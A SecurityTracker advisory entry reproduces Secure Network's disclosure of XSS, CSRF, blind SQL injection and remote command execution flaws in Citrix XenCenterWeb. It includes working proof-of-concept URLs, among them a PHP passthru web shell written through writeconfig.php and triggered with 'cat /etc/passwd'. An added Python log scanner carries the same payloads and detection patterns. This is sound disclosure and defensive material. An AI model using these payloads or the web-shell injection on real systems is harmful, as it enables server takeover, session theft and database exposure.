SecurityTracker.com
Category:  Application (Generic)  >  Citrix XenCenterWeb Vendors:  Citrix
Citrix XenCenterWeb Multiple Flaws Permit Cross-Site Scripting, SQL Injection, and Remote Command Execution Attacks
SecurityTracker Alert ID:  1022520
SecurityTracker URL:  http://securitytracker.com/id?1022520
CVE Reference:  CVE-2009-3757 ,  CVE-2009-3758 ,  CVE-2009-3759 ,  CVE-2009-3760   (Links to External Site)
Updated:  Oct 28 2009
Original Entry Date:  Jul 7 2009
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Description:  Several vulnerabilities were reported in Citrix XenCenterWeb. A remote user can execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.

A remote user can invoke the '/var/www/config/writeconfig.php' script (or cause a target user to invoke the script) to write arbitrary data to '/usr/local/lib/php/include/config.ini.php' and then access the console script to cause the data to be executed. The code will be executed with the privileges of the target web service.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Citrix XenCenterWeb software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'username' parameter in 'edituser.php' is affected. The 'location', 'vmname', and 'sessionid' parameters in 'console.php' are affected.

Other parameters and scripts are affected.

The 'login.php' script does not properly validate user-supplied input in the 'username' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

https://[target]/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false')/*
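As an added example (not part of the SecurityTracker entry or the Secure Network advisory), the following Python script scans web-server access-log lines for the request shapes described above: the UNION/benchmark SQL injection against 'login.php', PHP code submitted through 'writeconfig.php', its trigger through a 'cmd' parameter on 'console.php', and script tags in the 'console.php' parameters. The log lines are constructed, and the assumption that 'console.php' takes no 'cmd' parameter in normal use is marked in the code.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines (not taken from the advisory); the
# query strings mirror the request shapes the advisory describes.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2009:16:59:16 +0200] "GET /login.php?username=alice HTTP/1.1" 200 512
10.0.0.9 - - [07/Jul/2009:17:01:02 +0200] "GET /login.php?username=user%27%20UNION%20SELECT%20if(user()%20LIKE%20%27root@%25%27,%20benchmark(1000000,sha1(%27test%27)),%20%27false%27)/* HTTP/1.1" 200 512
10.0.0.9 - - [07/Jul/2009:17:02:40 +0200] "GET /config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27 HTTP/1.1" 200 88
10.0.0.9 - - [07/Jul/2009:17:02:41 +0200] "GET /console.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1402
10.0.0.7 - - [07/Jul/2009:17:05:00 +0200] "GET /console.php?location=1&sessionid=1&vmname=myVM%3Cscript%3Ealert(123)%3C/script%3E HTTP/1.1" 200 2210
"""

# Client IP and request target from a combined-log-format line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/')

# Checked in this order against each URL-decoded parameter value; first hit wins.
RULES = [
    ("php-code-in-config", re.compile(r"<\?php|\?>|passthru\s*\(|\$_REQUEST", re.I)),
    ("sql-injection", re.compile(r"union\s+select|benchmark\s*\(|sleep\s*\(", re.I)),
    ("xss", re.compile(r"<\s*script|javascript:", re.I)),
]


def classify_value(value):
    """Return the name of the first rule the decoded value matches, else None."""
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return None


def scan_log(text):
    """Return one finding per suspicious request parameter: (ip, path, param, rule)."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        params = parse_qsl(parts.query, keep_blank_values=True)  # decodes %xx
        for name, value in params:
            rule = classify_value(value)
            if rule:
                findings.append((m.group("ip"), parts.path, name, rule))
        # Assumption: console.php takes no 'cmd' parameter in normal use; the
        # advisory shows 'cmd' only as the trigger for the injected PHP code.
        if parts.path.endswith("/console.php") and any(n == "cmd" for n, _ in params):
            findings.append((m.group("ip"), parts.path, "cmd", "console-cmd-trigger"))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("%-10s %-28s %-9s %s" % finding)
```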

The vendor was notified on June 1, 2009.

Alberto Trivero and Claudio Criscione of Secure Network reported these vulnerabilities.

The original advisory is available at:

http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt

[Editor's note: The vendor has clarified that the affected software is sample code that was included in the XenServer Resource Kit. The code is no longer available and is not supported.]

Impact:  A remote user can execute arbitrary code on the target system.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Citrix XenCenterWeb software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution:  No solution was available at the time of this entry.

[Editor's note: The vendor has clarified that the affected software is sample code that was included in the XenServer Resource Kit. The code is no longer available and is not supported.]

Vendor URL:  www.citrix.com/ (Links to External Site)
Cause:  Access control error, Input validation error
Reported By:  Claudio Criscione <c.criscione@securenetwork.it>
Message History:   None.


 Source Message Contents

Date:  Tue, 7 Jul 2009 16:59:16 +0200
From:  Claudio Criscione <c.criscione@securenetwork.it>
Subject:  Citrix XenCenterWeb Multiple Vulnerabilities

 
Secure Network - Security Research Advisory

Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities 
Systems affected: Citrix XenCenterWeb
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.citrix.com
Author(s): Alberto Trivero a.trivero@securenetwork.it - Claudio Criscione c.criscione@securenetwork.it
Vendor disclosure: 1/06/2009
Vendor acknowledged: 11/06/2009
Vendor patch release: n/a
Public disclosure: 06/07/2009
Advisory number: SN-2009-01
Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt


*** SUMMARY ***

Citrix XenCenterWeb is a web interface for Citrix XenServer environment 
management.
Users of XenCenterWeb will be able to see a list of Virtual Machines in the 
Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), 
get basic information about the hosts in the Resource Pools, information about 
the VMs and also connect to the console of the VMs.

Due to poor validation of some user controlled inputs, a variety of attacks 
against the application and the underlying server are possible.
Cross-site scripting, cross-site request forgery, SQL injection and remote 
command execution attack vectors were identified as well. 

XSS and CSRF attacks can be performed on the virtual appliance itself, while 
the others require the PHP parameter magic_quotes_gpc to be off on the web 
server.

*** VULNERABILITY DETAILS ***

(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and 
magic_quotes_gpc=On), both XSS and CSRF attacks can be executed.

The first XSS attack exploits the lack of sanitization in the username 
parameter in edituser.php script and requires the victim to be able to access 
configuration scripts: 
https://xencenterweb.loc/config/edituser.php?username=1<script>alert(document.cookie)</script>

Under the same conditions, a CSRF attack can be executed to change the password 
of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]

Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]

Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1"><script>alert(document.cookie)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM<script>alert(123)</script>
https://xencenterweb.loc/forcerestart.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM
https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><script>alert(123)</script><"
https://xencenterweb.loc/forcesd.php?vmrefid=1"><script>alert(123)</script><"&vmname=myVM

(b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL 
Injection attack. An attacker can retrieve the whole database schema through 
specially crafted requests. Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false')/*

Obviously, other high profile attacks can be performed through this attack 
vector.

(c) Remote Command Execution
An attacker could write arbitrary data in the file 
/usr/local/lib/php/include/config.ini.php through the file 
/var/www/config/writeconfig.php. Due to this unsecure behavior, arbitrary 
commands can be executed on the machine.
If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> <?php $cmd = $_REQUEST['cmd']; passthru($cmd); ?> <?php $xen = '

or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27

an attacker can then simply execute commands on the system through the 
console.php file:
https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;

*** EXPLOIT ***

Attackers may exploit these issues through a common browser as explained above.

*** FIX INFORMATION ***

No patch is currently provided by Citrix, and the application download has been 
removed. Citrix officially stated that "the tool was created to demonstrate how 
the SDK could be used to create unique solutions. Customers currently using it 
should assess the risks of continued use in light of your findings and, if 
these prove to be unacceptable, discontinue usage".

*** WORKAROUNDS ***

Common web application workarounds apply, like virtual patching from a web 
application firewall or similar solutions. However most of the reported issues 
can be mitigated by running the application only inside the virtual appliance 
or in properly configured web servers.

Secure Network would like to thank Citrix for its support during the disclosure 
process.

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company, 
which provides consulting and training services, and engages in security 
research and development. We are committed to open, full disclosure of 
vulnerabilities, cooperating whenever possible with software developers for 
properly handling disclosure.

This advisory is copyright 2009 Secure Network S.r.l. Permission is hereby 
granted for the redistribution of this alert, provided that it is not altered 
except by reformatting it, and that due credit is given. It may not be edited 
in any way without the express consent of Secure Network S.r.l. Permission is 
explicitly given for insertion in vulnerability databases and similars, 
provided that due credit is given to Secure Network.

The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. This information is 
provided as-is, as a free service to the community by Secure Network research 
staff. There are no warranties with regard to this information. Secure Network 
does not accept any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

If you have any comments or inquiries, or any issue with what is reported in 
this advisory, please inform us as soon as possible.

E-mail: securenetwork {at} securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788


Copyright 2007, SecurityGlobal.net LLC